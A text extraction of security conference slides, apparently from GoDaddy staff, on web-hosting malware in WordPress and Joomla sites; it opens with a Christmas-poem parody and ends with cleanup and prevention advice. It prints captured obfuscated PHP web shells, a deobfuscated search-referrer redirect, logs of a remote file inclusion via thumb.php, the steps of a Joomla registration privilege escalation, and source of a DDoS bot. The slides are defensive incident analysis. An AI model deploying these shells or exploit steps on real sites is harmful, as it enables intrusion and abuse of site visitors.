Twas the night before Malware

‘Twas the Night before

Malware…Presented byArleen Hess

Pax Whitmore

Twas the night before malware, and all through the house,

Not a peripheral was stirring, not even the mouse.

The plugins were arranged and running with care,

In the hopes that customers soon would be there.

When out in the logs there arose such a clatter,

I sprang to my terminal to see what was the matter.

And what to my wondering eyes should appear,

But KAK and FilesMan were all up in here.

The new site was running, the dev site was shed,

And users into the website were led,

WordPress in its kerchief, and Joomla! in its cap,

Had just fallen in to the ol' malware trap.

Disclaimer

• The thoughts and opinions expressed in this presentation are those of the presenters and are not a reflection of the official policies or positions of GoDaddy.com, LLC.

About Us

Outline

• What is malware?• All for LULZ?• Why look at a CMS?• Discovering malware• Malware examples – WordPress– Joomla!– FTP Compromise

• How to find and fix malware• How to prevent malware

What is malware?

• Short for malicious software• Used to disrupt websites in a variety of ways– Redirect users to phishing sites– Download files onto users’ computers– Use exploited system as a base of DDoS or

phishing attacks

All for LULZ?

Why look at a CMS?

• Content Management Systems are widely-used– WordPress 3.4 has over 23 million downloads– Joomla! powers over 2600 government sites

• Open-source applications are complex• Wide range of plugins and themes

Discovering Malware…

• Site owner alerted by users

• Users being blocked or redirected

• Found site was listed on Google Safe Browsing

WordPress – Search

• Ran a script to search for common malicious content

2011-11-23 00:53:42 /wp-content/themes/mainstream /cache/74bd10fe94d1b17c86da24fd8df55f65.php

2012-09-09 14:19:08 /wp-content/themes/mainstream /cache/27b23905b513a0ba176072cae7f53ede.php

2012-10-24 02:40:28 /wp-content/themes/mainstream /cache/ca0f54f8f7599facfa9af8b66ac11a5f.php

WordPress – Content strings 74bd10fe94d1b17c86da24fd8df55f65.phpGIF89a??????????!??????,?????;?$language = 'eng';$auth = 0;$name = ''; // md5 Login$pass = ''; // md5 Password/

**************************************************************************************************************************************************************/

error_reporting(0);$bery="7b17e9pVsjj8f54n307R+gwwgzHibxs79vh+W[snip]iyHw4+KGLx/

jYt9xQylp4qX+7QqTvmwNSHgUHnBEgKlU81/2eylkbI2gTR7pjAHRsY4CpqSbdYG3tzrqSWRcnpPUt5vPrJ6lC87bINeAc7hVDl3tKh+VCzNwDDQnqnJnCLWGylTdAKpSc1mV7emKh5OG704OiDJKaX8rEUzG1ozt/eAnjTMAuGYX2MuwG7M7J4OhpX09AAdqgq4uLFn05UmpXeURYo2w7oqae6boO9S0QaoOEhsp6uvE1yKsYASiywIF2QsTi2YP2PQqu/Olr9nW6vCxJ4DS3Tja9fKyzmsWYqQqMizcIf8kQMzVmreD8wkr5bgzqQBDYXYuxBtKtCI3R2qkH5A4e5+sh11Q0Tr2uoNyxcF/8ZNl5bnjj2KJtdjFmpRY/GntsG/jRa8LF+Ckypw0+rpXmNldO+yb2szqAOgnnqZ0oLmL9tE0gtjrDqMzSqR1n1OFumcPabprJ6j8gEB6UqyT+T+EhWGS/icAUOlxF2Gd/1L/vWnf5anMFCDBv5Q9NpWbOPg4w9P7/2TG7wLHiMW0Uf1mQWIXPL7AoG/TI4w/Roen7eloac8Adio9dzv7WirfgeJnGg6UvPrCr/Pw==";

eval(gzinflate(str_rot13(base64_decode($bery))));

WordPress – Content strings 27b23905b513a0ba176072cae7f53ede.phpGIF89a eval (base64_decode

("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIERuZkNEMVJTRzZrRDggK

strings ca0f54f8f7599facfa9af8b66ac11a5f.php

/*gHrE={M*/eval/*t%)t*/(/*_f0srO*/base64_decode/*\x31sm*/(/*Y%>\\*/'Lyo/WFdNR2Z5byovZXZhbC8qTEBXfjUqLygvKidoSCovYmFzZTY0X2RlY29kZS8qNXJcYzAqLygvKjo+ZEMqLydMeW83VmtwQlN6NHFMMmxtTHlwN2IxNHFMeWd2S24nLyp0XVJKOiovLi8qYVw+Ml1rKi8nUTlPSHRtTlM0cUwybHpjMlYwTHlwQWV6WlJMU292Jy8qPn5NLSovLi8qLmBrVGdVTCovJ0tDOHFPVEJlTkU4cUx5UmZVa1ZSVlVWVFZDOHFXRycvKik6WiovLi8qOURGREl5cyovJ29sZmpZcUwxc3ZLa1JsYkNvdkoyRW5MeW9vTVNseCcvKkZiTkBXSSovLi8qYkR2SzYqLydWQ292TGk4cWZGVXdYQ292SjNOakp5OHFKazAzTWknLypmKTR7cSovLi8qfU9KV1hmKi8nb3ZYUzhxZWpaeUlGd3FMeThxVW1rM1dYQXFMeWt2Jy8qIHtTKzs8PiovLi8qbWU/UyovJ0tuSmRQelZOS2k4dktpWkRmQ292S1M4cVpWTnNYbicvKmBhcEgmMkwqLy4vKlJPTzslKi8nNThLaTls'/*`!3'1W*/./*Py1!!Ff5>*/'ZG1Gc0x5cDdXV0VxTHlndktpdFVKa2NxJy8qOWlhLksqLy4vKltFPEpOPCovJ0wzTjBjbWx3YzJ4aGMyaGxjeThxZEhsV0tpOG9MeScvKklUdlh+di0qLy4vKlZRcyovJ3BoSlNZK0tpOGtYMUpGVVZWRlUxUXZLajl0VDA5dycvKkV3PiovLi8qVmM9SXJXZyovJ09rcDFLaTliTHlwUlJqRXBLaThuWVNjdktrMWNRVScvKjhmZCovLi8qYmFbNSovJ01xTHk0dktuUkVaMWtxTHlkell5Y3ZLbWxUZUhGTScvKjt2O3I7WyAqLy4vKis2XFQzKi8nUWxRcUwxMHZLakJtWjFjcUx5OHFOSHRtVTJBcUx5Jy8qbURzMigqLy4vKid7aHEqLydrdkttWlNXRThoTFNaQ0tpOHZLaTAyWG50eEtpOHAnLypjTXEqLy4vKkRxcyovJ0x5cHVWSFJKS2k4dkttUjNPMHNxTHpzdkttUW9KeW92Jy8qPE1NVCovKS8qRlZQbyovLyp7T15LKi8pLypRRkttZnYwKi8vKn5PSiovOy8qP2QxZldzKi8='/*XYx!oU92*/)/*3{]}s*//*,NC123~P*/)/*m!?`\*//*w!blx*/;/*upY`MI2*/

Deobfuscation ==error_reporting(0);$qazplm=headers_sent();if (!$qazplm){$referer=$_SERVER['HTTP_REFERER'];$uag=$_SERVER['HTTP_USER_AGENT'];if ($uag) {if (!stristr($uag,"MSIE 7.0")){if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or

stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun(dot)ru") or stristr($referer,"stumbleupon(dot)com") or stristr($referer,"bit(dot)ly") or stristr($referer,"tinyurl(dot)com") or preg_match("/yandex\(dot)ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace(dot)com") or stristr($referer,"facebook(dot)com") or stristr($referer,"aol(dot)com")) {

if (!stristr($referer,"cache") or !stristr($referer,"inurl")){header("Location: http://malicious(dot)evulz(dot)com/");exit();

WordPress – Log Review

x.x.x.x - - [09/Sep/2012:14:18:58 -0700] "GET /wp-content/themes/mainstream/functions/thumb.php?src=http://blogger.evulz.tld/stat/n/s.php HTTP/1.1" 404

x.x.x.x - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php HTTP/1.1" 200

x.x.x.x - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php?src=http://blogger. evulz.tld/stat/n/s.php HTTP/1.1" 200

WordPress – What Happened?

• Attackers used thumb.php

• Three separate times– Over one year

• Thumb.php was not updated

• Uploaded shells were used to alter other content

Joomla! – How it works

– Exploiting Joomla! 1.6.x/1.7.x/2.5.0-2.5.2• index.php?option=com_users&view=registration

– Start to register a user account– Cause the registration process to fail• Failing to enter the same pwd twice• Failing the captcha

– Before submitting elevate user privilege to admin• Firebug: <input name="jform[groups][]" value="7" />• Tamper Data: jform[groups][]=7

– Complete registration when the form reloads

Joomla!

• Sample logs showing the registration of the malicious user:

x.x.x.x - - [02/Aug/2012:09:03:32 -0700] "POSTevulz.tld/component/users/?task=registration.registerHTTP/1.1" 303

x.x.x.x - - [02/Aug/2012:09:03:34 -0700] "POST evulz.tld/component/users/?task=registration.register HTTP/1.1" 303

Joomla!• Sample logs showing the error.php file being edited:

x.x.x.x - - [04/Aug/2012:00:31:17 -0700] "POSTevulz.tld/administrator/index.php HTTP/1.1" 303

x.x.x.x - - [04/Aug/2012:00:31:23 -0700] "POSTevulz.tld/administrator/index.php?option=com_templates&layout=editHTTP/1.1" 303

x.x.x.x - - [04/Aug/2012:00:31:25 -0700] "POSTevulz.tld/administrator/index.php HTTP/1.1" 303

x.x.x.x.x - - [04/Aug/2012:00:31:28 -0700] "POSTevulz.tld/administrator/index.php?option=com_templates&layout=editHTTP/1.1" 303

Joomla! - Contenterror_reporting(0);$base = dirname(__FILE__)."/";function stoped() {

unlink($base."stph.php");unlink($base."stcp.php");cmdexec("killall ping;");cmdexec("killall -9 perl; killall -9 perl-bin;killall -9 perl-cgi;");unlink($base."start.php");unlink($base."f1.pl");unlink($base."run.pl");unlink($base."startphp.php");

print "<stopcleandos>Stop & Clean</stopcleandos>";

function UploadFile($File){

cmdexec("killall -9 perl");cmdexec("killall -9 perl-bin");cmdexec("killall -9 perl-cgi");$target_path ="./";$target_path = $target_path . basename( $File['name']);@move_uploaded_file($File['tmp_name'], $target_path);

}function cmdexec($cmd){

if(function_exists('exec'))@exec($cmd);

elseif(function_exists('shell_exec'))@shell_exec($cmd);

Joomla! - Content

$up = "<?php eval(gzinflate(base64_decode('jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+Vc2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1aTi2mGSmT8L/Lj7mfJwd/8B')));

Joomla! - Contentswitch($_POST['action']){

case "upload":UploadFile($_FILES['file']);break;case "stop":stoped();break;case "ust":$page = curPageURL();$ip = $_POST['ip'];$port = "11";$out = $page."\n";$socket = stream_socket_client("udp://$ip:$port");if ($socket) {stream_set_write_buffer($socket, 0);stream_socket_sendto($socket,$out);

}fclose($socket);break;case "ab":$url = $_POST['url'];$c = $_POST['c'];$n = $_POST['n'];cmdexec("ab -c $c -n $n $url");break;default:DNullRequest();break;}

The moral of the Joomla! Story…

FTP Compromise2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [15608]created SomeMaliciousFile.exe2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14608]closed - - 426 0 0 - -2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14608]created

/MyRealUser/Dir1/MyDownloaderSetupFull.exe2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711]USER MyRealUser2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711]PASS - - 230 0 0 - -2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711]CWD /MyRealUser/Dir1 2012-10-18 22:12:06 x.x.x.x MyRealUser 21 [14609]appended /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:16:45 x.x.x.x MyRealUser 21 [14609]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:19:56 x.x.x.x MyRealUser 21 [14711]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:21:07 x.x.x.x MyRealUser 21 [14609]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:34:05 x.x.x.x MyRealUser 21 [14609]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:37:42 x.x.x.x MyRealUser 21 [14711]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:46:51 x.x.x.x MyRealUser 21 [14711]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:48:14 x.x.x.x MyRealUser 21 [14609]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:51:20 x.x.x.x MyRealUser 21 [14711]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:51:56 x.x.x.x MyRealUser 21 [14711]created SomeMaliciousFile.exe - 550 0 240120 -

How FTP Gets Compromised

• Keyloggers or other malicious software on your computer

• Gaining FTP access via your own credentials and IP

How to find and fix malware

• Automated tools or scripts search for common phrases or exploits

• Check commonly affected files, such as .htaccess, header.php, footer.php, etc.

• Check for odd filenames or typos (e.g. indx.php vs. index.php)

• Review and edit each file individually• Restore from clean backups (which everyone

keeps, right?)

How to prevent malware

• Keep your web application up-to-date• Regularly check your content• Use strong and unique passwords• Ensure your own computer is secure• Remove unused or old content from server• Keep your clean backups totally separate

Tools

• http://www.rexswain.com/httpview.html• http://jsunpack.jeek.org/• http://home.paulschou.net/tools/xlate/• https://www.owasp.org/index.php/Main_Page• http://nvd.nist.gov/• http://osvdb.org/• http://codex.wordpress.org/

Hardening_WordPress